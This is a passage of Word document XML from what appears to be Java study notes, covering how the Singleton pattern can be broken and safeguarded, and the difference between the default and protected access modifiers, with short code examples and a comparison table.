    <w:p w14:paraId="093BB678" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E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52D3CD12" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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flection, Serialization, and Multiple Class Loaders</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can all break the Singleton pattern by creating multiple instances of the Singleton class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226EFD37" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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loning</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Thread-Safety issues</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can also break the Singleton pattern if not handled properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F4DA02" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E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o prevent breaking the Singleton pattern, you can implement the following safeguards:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5C4CF4" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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the readResolve() method to handle serialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5200F864" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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event cloning by overriding the clone() method and throwing CloneNotSupportedException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4606AC" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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sure thread-safety using synchronization or volatile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7AAF01" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00E220E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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event reflection access to the constructor by throwing an exception in the constructor if an instance already exists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4750892F" w14:textId="28587915"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F9E560F">
          <v:rect id="_x0000_i1184" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EB3CF5" w14:textId="622E65AD" w:rsidR="00946676" w:rsidRPr="00CE4B95" w:rsidRDefault="00DA7204">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc196307537"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="002C3B85" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ifference between default and protected access modifier</w:t>
      </w:r>
      <w:r w:rsidR="00946676" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="59D6ECEA" w14:textId="15EFE91E" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2ABA">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access modifiers determine the visibility or accessibility of classes, methods, variables, and constructors. Both </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default</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protected</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> access modifiers provide different levels of access within different scopes. Here’s a comparison between them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254BC50B" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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Default Access Modifier (Package-Private)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D31062" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2ABA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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isibility:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> access modifier, also known as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>package-private</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, is the access level when no modifier is specified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A287431" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2ABA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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 Scope:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The member is accessible only within the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same package</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It cannot be accessed from classes outside the package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFE478F" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2ABA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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heritance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If a class has a default access modifier, subclasses in the same package can access it. However, subclasses in different packages cannot access it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120BDE91" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2ABA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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6C661B31" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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MyClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242E21AF" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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num;  // default access modifier (package-private)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CF0C38" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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A148B6C" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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show() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61358839" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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Inside MyClass");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB7D250" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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00C3E92" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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0C95C61" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E9BA18" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2ABA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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um and show() are only accessible within the same package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C952827" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2ABA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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you try to access num or show() from another package, a compilation error will occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51321631" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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Protected Access Modifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098A2E38" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2ABA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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isibility:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>protected</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> access modifier allows access to the member from the same package and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subclasses</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (including subclasses in different packages).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151BDAB6" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2ABA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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 Scope:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A member marked as protected is accessible:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A22CB7" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2ABA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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ithin the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same package</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309A55F4" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2ABA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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y subclasses (even if they are in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different packages</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE03394" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2ABA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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y other classes in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same package</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5327889C" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2ABA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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heritance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Subclasses can inherit and access protected members from the parent class, even if they are in a different package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB0AC54" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2ABA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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4ACFDC52" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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Parent {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23440C69" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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otected int num;  // protected access modifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049CCABA" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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E19E5FD" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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otected void show() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1298D907" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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Inside Parent class");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCAAB47" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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6196C14" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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8541854" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2ABA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D3618EB" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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class Child extends Parent {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F66D75F" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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display() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076135DA" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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num);  // Accessible because it's inherited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375B939C" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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how();  // Accessible because it's inherited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3A8FFA" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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4B24E87" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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77B4951" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB86BB5" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2ABA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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um and show() are accessible from the Child class because Child is a subclass of Parent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1109034E" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2ABA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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ven if Child were in a different package from Parent, num and show() would still be accessible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D08740" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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7"/>
        <w:gridCol w:w="3970"/>
        <w:gridCol w:w="4657"/>
      </w:tblGrid>
      <w:tr w:rsidR="007C2ABA" w:rsidRPr="00CE4B95" w14:paraId="2B3DE9C4" w14:textId="77777777" w:rsidTr="00961A43">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57E179C4" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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0009340A" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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fault (Package-Private)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C1E2352" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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rotected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C2ABA" w:rsidRPr="00CE4B95" w14:paraId="23E1E440" w14:textId="77777777" w:rsidTr="00961A43">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="013DD7C1" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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isibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C8AA888" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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ccessible only within the </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>same package</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E7043B3" w14:textId="77777777" w:rsidR="00961A43" w:rsidRPr="00CE4B95" w:rsidRDefault="00961A43" w:rsidP="007C2AB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ccessible within the </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>same package</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> and by </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>subclasses</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (even if in different packages)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C2ABA" w:rsidRPr="00CE4B95" w14:paraId="2904C33A" w14:textId="77777777" w:rsidTr="00961A43">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
